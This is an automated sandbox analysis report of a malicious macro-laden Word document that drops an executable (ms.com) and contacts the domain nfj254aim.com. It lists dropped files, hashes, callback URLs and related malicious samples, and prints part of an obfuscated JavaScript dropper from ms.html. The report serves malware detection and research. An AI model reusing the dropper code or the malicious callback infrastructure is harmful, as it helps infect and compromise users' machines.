C:\Users\Public\ms.com	0%	Metadefender		Browse
C:\Users\Public\ms.com	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://nfj254aim.com/analytics/0	0%	Avira URL Cloud	safe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nfj254aim.com	172.67.164.220	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	false		high
http://investor.msn.com	ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	ms.com, 00000002.00000002.2353870588.0000000003710000.00000002.00000001.sdmp	false		high
http://nfj254aim.com/analytics/0	ms.com, 00000002.00000003.2097326345.0000000002BD5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	false		high
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw	ms.com, 00000002.00000002.2353753641.000000000339D000.00000004.00000001.sdmp, ms.com, 00000002.00000002.2354478986.0000000003F60000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	ms.com, 00000002.00000002.2353870588.0000000003710000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.164.220	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	326338
Start date:	03.12.2020
Start time:	10:05:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	documenti 12.01.20.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.expl.winDOC@2/13@2/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 4.1% (good quality ratio 2.3%) Quality average: 50.6% Quality standard deviation: 46.6%
HCA Information:	Successful, ratio: 59% Number of executed functions: 8 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:05:41	API Interceptor	881x Sleep call for process: ms.com modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.122.135
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.122.135
	officialdoc!_013_2020.exe	Get hash	malicious	Browse	104.24.126.89
	https://tvronline.com/ihs	Get hash	malicious	Browse	104.16.123.96
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.123.135
	2020-12-03_08-45-45.exe.exe	Get hash	malicious	Browse	104.31.70.85
	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.130.233
	invoice.xlsx	Get hash	malicious	Browse	172.67.143.180
	Vlpuoe2JSz.exe	Get hash	malicious	Browse	23.227.38.74
	MxL5EoQS5q.exe	Get hash	malicious	Browse	104.27.146.3
	imVtKjcvlb.exe	Get hash	malicious	Browse	172.67.146.58
	Quote.exe	Get hash	malicious	Browse	172.67.188.154
	doc-3860.xls	Get hash	malicious	Browse	104.31.87.226
	LIST_OF_IDs.xls	Get hash	malicious	Browse	104.22.1.232
	niteEnrgy.xlsx	Get hash	malicious	Browse	162.159.134.233
	Shipment Document BL,INV and packing list.jpg.exe	Get hash	malicious	Browse	23.227.38.74
	info1270.xls	Get hash	malicious	Browse	104.28.11.60
	urXFLGgIxo.xls	Get hash	malicious	Browse	104.22.0.232
	urXFLGgIxo.xls	Get hash	malicious	Browse	172.67.8.238
	https://icsheadstart-my.sharepoint.com/:b:/g/personal/agreer_ics-hs_org/Efrk8FYTb6pNqHO8jgX4qqcB1ibAW9ZmUWYUGIEnXM4YxA?e=4%3a8jNJwB&at=9	Get hash	malicious	Browse	104.16.18.94

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\Public\ms.com	dettare-12.01.2020.doc	Get hash	malicious	Browse
	dettare-12.01.2020.doc	Get hash	malicious	Browse
	legal paper-12.01.2020.doc	Get hash	malicious	Browse
	legal paper-12.01.2020.doc	Get hash	malicious	Browse
	statistics,11.20.2020.doc	Get hash	malicious	Browse
	statistics,11.20.2020.doc	Get hash	malicious	Browse
	commerce _11.20.2020.doc	Get hash	malicious	Browse
	commerce _11.20.2020.doc	Get hash	malicious	Browse
	file-11.20.doc	Get hash	malicious	Browse
	file-11.20.doc	Get hash	malicious	Browse
	inquiry-010.14.2020.doc	Get hash	malicious	Browse
	direct_010.20.doc	Get hash	malicious	Browse
	command-11.05.2020.doc	Get hash	malicious	Browse
	command-11.05.2020.doc	Get hash	malicious	Browse
	input 11.20.doc	Get hash	malicious	Browse
	official paper_11.20.doc	Get hash	malicious	Browse
	legal agreement 11.20.doc	Get hash	malicious	Browse
	specifics 11.05.2020.doc	Get hash	malicious	Browse
	particulars,11.20.doc	Get hash	malicious	Browse
	official paper_11.20.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xspcd2[1].htm Download File
Process:	C:\Users\Public\ms.com
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	205
Entropy (8bit):	5.155240244937957
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
MD5:	6C598B85477C948D2A6C50AB26631415
SHA1:	429CE2C54B01450B0250D423F08886A0F6B567DB
SHA-256:	04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
SHA-512:	9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
Malicious:	false
Reputation:	low
IE Cache URL:	http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDAC4C20.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	[TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=Paint.NET v3.5.11], baseline, precision 8, 994x241, frames 3
Category:	dropped
Size (bytes):	57258
Entropy (8bit):	7.900983242117529
Encrypted:	false
SSDEEP:	768:Nne7FOQKYij8iCi2EQrb4lF6j5UTFRHehGLOAFed/6CO2wPbttab/jz7Q+6fNsaw:Ne7Il+Oy4wUOAL2wPbnQ/Tz6CaCd
MD5:	B44AC26E80A557B913B715F234C3D769
SHA1:	1E0574649A9E5BBE0283D83A801E0E3EC4261BBC
SHA-256:	1EFAC6DE241D24814D7925C803E3ACBF4E2CD4A90FDE9C6826613DE2A8063B7B
SHA-512:	4349E729AEDC4E69A92432553C0BEA8CF5D4D92E7908F25DB5DF3E1B3628F74D362AFD15AED5EED12E53ABDFFAB44F81E39006C8C6FF4D242A05D45AFFA08E5D
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....hExif..MM..................>...........F.(...........1.........N.......`.......`....Paint.NET v3.5.11....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......C@.9.cJ9.b.....^..e...G..~.vP/...]f...Zh.....1y.7.%R5'v.WE..@..J.N....V....9.e...$a....R..R..{...........).......O.\|<.-bR.>..^.F[$a........... ....r.../.....?.._.....'.7A+.r...3..Yj..o.'o....=)k......?..8.._....K................g....8...e\...e.(...q..1.2.W.3...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E8D2110-90B9-4F45-8DA5-C9F08E2C2850}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3ACE9457-B805-4EFF-88D9-90E4D60A664E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:X:X
MD5:	32649384730B2D61C9E79D46DE589115
SHA1:	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256:	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512:	A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D4EBC2C3-5E89-4E87-9FC7-826890A46AAD}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.3796147056131488
Encrypted:	false
SSDEEP:	3:9l3lli4wltfSP8lFllItEMAWuWy:kFSP8gtEMAWpy
MD5:	39F0255F9BB41BD49E765898D326FB77
SHA1:	8AD67EEB7CF2ED4CA7DD1AF586406DE92113C6F1
SHA-256:	7DB4A7FAFE19900A941F5EC134454C4769D6D1F8227A176A3CEBD9F3C7D86056
SHA-512:	6FD2E6037C25B4EC5D091B9E2C3F2E9EC04FC3A59AFD79D980ED0E11FFEEFBA18EA535B1C0443A01BC50C5AED4C4F1150B0487B89CE35B2B440D323B40592B28
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....../.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp.tmp Download File
Process:	C:\Users\Public\ms.com
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.155240244937957
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
MD5:	6C598B85477C948D2A6C50AB26631415
SHA1:	429CE2C54B01450B0250D423F08886A0F6B567DB
SHA-256:	04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
SHA-512:	9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documenti 12.01.20.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Thu Dec 3 17:05:38 2020, length=88302, window=hide
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	4.555810730641705
Encrypted:	false
SSDEEP:	24:8jS/XTd6jFywYeMsKHDv3qcTdM7dD2jS/XTd6jFywYeMsKHDv3qcTdM7dV:8e/XT0jFKmKGWQh2e/XT0jFKmKGWQ/
MD5:	302F7D12230D43208569FA5AE1D4E4CF
SHA1:	D648D4EEB8749A2E9AAB530F288736253BC8A837
SHA-256:	D2B42FA6E2DD841E579F57558A6DE425978B3B938E848AC3EA9330ACD0C6BC35
SHA-512:	4F756A380721C76D401E255812DE5F60B0D77A322FD3BD6045B188C6ACBB6326E6983CD92A80157015F29DE9C609F5CE9892F802DC01CA972D68F80F470DBF3D
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...~....{..~....{.........X...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..X...Q.. .DOCUME~1.DOC..Z.......Q.y.Q.y...8.....................d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop\documenti 12.01.20.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.323234076376603
Encrypted:	false
SSDEEP:	3:M18H9LRB/ZELRB/mX18H9LRB/v:M+H9LxELLH9L3
MD5:	51CD26B6AD58A57E3117C7891A2E898A
SHA1:	118C0F24D024CEF1CED16EACA93A556CAE82C721
SHA-256:	A2C3E26D19A5762331B519B63FE654F184C7662D14132C55E7A3594110066FDC
SHA-512:	3096AE1E0C209244F7123FA025CE8F45594B3C195BE6325495DDFA6D60936B0E21066F6783D0B2022DD52400A95DE2EF783BAFA04F9EA437669CB836945CDFDF
Malicious:	false
Reputation:	low
Preview:	[doc]..documenti 12.01.20.LNK=0..documenti 12.01.20.LNK=0..[doc]..documenti 12.01.20.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ST7SUM6R.txt Download File
Process:	C:\Users\Public\ms.com
File Type:	ASCII text
Category:	downloaded
Size (bytes):	115
Entropy (8bit):	4.352469126417653
Encrypted:	false
SSDEEP:	3:GmM/R9T/byAMUudTXSvLDv+2KlSNhdhSi4RgWd:XM/R9TzyPeTb+2KlWs
MD5:	45D92345F1BB8A3E4B6D6FD6D55C1413
SHA1:	5A961C47B7CA5B7BFD66AEDA0A15678CAD67D040
SHA-256:	74BEF34782C996D470100BA77438E51352243B36306AD30203FA8B7EA195589B
SHA-512:	14846E2CE9B7AAA9D3A59356A6B2F6CF9BABC39267158BD254FEC32B3E564D5F2D22ACD93CB1513F8EC2D1265A5D9E3CD08FE9D7D526247CA6A42B5A0E71B02C
Malicious:	false
Reputation:	low
IE Cache URL:	nfj254aim.com/
Preview:	__cfduid.dfea0fff404279bf026617fbd4da27f291606986357.nfj254aim.com/.9728.2068891776.30859494.3928236319.30853534.*.

C:\Users\user\Desktop\~$cumenti 12.01.20.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\Public\ms.com Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	4.419080301347865
Encrypted:	false
SSDEEP:	192:aQNrOJPtfF4xtpOZ4UlT7phhbPWwelJIR:3yFu6CUlT7hWw6
MD5:	95828D670CFD3B16EE188168E083C3C5
SHA1:	83C70C66CD4E971BE2E36EFDC27FBCB7FF289032
SHA-256:	8C10AE4BE93834A4C744F27CA79736D9123ED9B0D180DB28556D2D002545BAF2
SHA-512:	22BE50366CF57FD3507760122CCAA3D74E6A137C2D46377597284D62762BFCA740BED71DDC4ECA60E4BA81055EB3D1BDE34AF382A2C4587BA9335D670D7F3B2E
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: dettare-12.01.2020.doc, Detection: malicious, Browse Filename: dettare-12.01.2020.doc, Detection: malicious, Browse Filename: legal paper-12.01.2020.doc, Detection: malicious, Browse Filename: legal paper-12.01.2020.doc, Detection: malicious, Browse Filename: statistics,11.20.2020.doc, Detection: malicious, Browse Filename: statistics,11.20.2020.doc, Detection: malicious, Browse Filename: commerce _11.20.2020.doc, Detection: malicious, Browse Filename: commerce _11.20.2020.doc, Detection: malicious, Browse Filename: file-11.20.doc, Detection: malicious, Browse Filename: file-11.20.doc, Detection: malicious, Browse Filename: inquiry-010.14.2020.doc, Detection: malicious, Browse Filename: direct_010.20.doc, Detection: malicious, Browse Filename: command-11.05.2020.doc, Detection: malicious, Browse Filename: command-11.05.2020.doc, Detection: malicious, Browse Filename: input 11.20.doc, Detection: malicious, Browse Filename: official paper_11.20.doc, Detection: malicious, Browse Filename: legal agreement 11.20.doc, Detection: malicious, Browse Filename: specifics 11.05.2020.doc, Detection: malicious, Browse Filename: particulars,11.20.doc, Detection: malicious, Browse Filename: official paper_11.20.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.]..............<.......>.......=.......8............... .......:.......?.....Rich............PE..d...w.[R.........."..........(.................@....................................9b....`.................................................xA..P....P.......0...............p......@...............................`................@..x............................text............................... ..`.data........ ......................@....pdata.......0......................@..@.idata..j....@......................@..@.rsrc........P....... ..............@..@.reloc..b....p.......4..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\ms.html Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17904
Entropy (8bit):	5.221943493256307
Encrypted:	false
SSDEEP:	192:eBZQiLCb1hint4zdt1e870k0hs70k0C2qNXl6qJExTxvYj0lXUZIeYsa3UKh73uy:e3QYnadWs4TxYI2ZHeM7MQc
MD5:	7F908F1EE0BBB0B276589F06368A008D
SHA1:	EE9D0FA4C45AEB9C75750AA003E7C0F0F22E348D
SHA-256:	8B23A9189FD2FE4CC89459224ED36E7A64121DE9589D3AC9CEAE9E4DEEF7F23A
SHA-512:	3FBEBBCD1B5F2A731470037A702BA58EEFBC0764874D465539E90B6FCD4BA16E93221E8EB402BF2D3B603A6B4D81E3B1A2E68EA3625A93716F4EF991FA625633
Malicious:	false
Preview:	<html>..<body>..<script language="javascript">..var a3MQw4 = true;..var a3yaLo = -47909;..function decode(input)..{..var keystr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";..var output = "";..var chr1, chr2, chr3;..var enc1, enc2, enc3, enc4;..var i = 0;..input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");..while (i < input.length)..{..enc1 = keystr.indexOf(input.charAt(i++));..enc2 = keystr.indexOf(input.charAt(i++));..enc3 = keystr.indexOf(input.charAt(i++));..enc4 = keystr.indexOf(input.charAt(i++));..chr1 = (enc1 << 2) \| (enc2 >> 4);..chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2);..chr3 = ((enc3 & 3) << 6) \| enc4;..output = output + String.fromCharCode(chr1);..if(enc3 != 64)..{..output = output + String.fromCharCode(chr2);..}..if(enc4 != 64)..{..output = output + String.fromCharCode(chr3);..}..}..return(output);..}..var aVEqp = true;..var atpoA = "HKEY_CURRENT_USER\\Software\\aHgVT\\auJ5v2";..var a7PjY = "a9IlS";..var a4qgwu = a7PjY.length;..anD3Wb = true;..window

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.894769517768764
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99% Word Microsoft Office Open XML Format document (49504/1) 32.35% Word Microsoft Office Open XML Format document (43504/1) 28.43% ZIP compressed archive (8000/1) 5.23%
File name:	documenti 12.01.20.doc
File size:	93665
MD5:	f530de77053a5c25a94f930bb954bcf8
SHA1:	46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:	1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
SHA512:	f35b4d0cf4d0665117f58792a4d0fe51f13210921c1ac9d715160a4f9708e09817c6f0ab65e2c37c493a22d41fdacaaba1775fb8cc205b9d3e4855258892f916
SSDEEP:	1536:A/rBcK6fNcSI7O8hRe7Il+Oy4wUOAL2wPbnQ/Tz6CaC/B2RrNbSxQml:w6lfNu/Q7Y9wkFncTZB2RrN9S
File Content Preview:	PK..........!.[...............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Template:	Normal.dotm
Total Edit Time:	0
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Number of Lines:	3
Number of Paragraphs:	0
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1127
Data ASCII:	. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . s . . : . . \\ L . . # Y * . . . . . g ~ . . L . o . . . . . . . . . . . . . . . . . . . . . . . . . . ! } . . . . u D . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! } . . . . u D . 1 . . . . . . s . . : . . \\ L . . # Y * . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
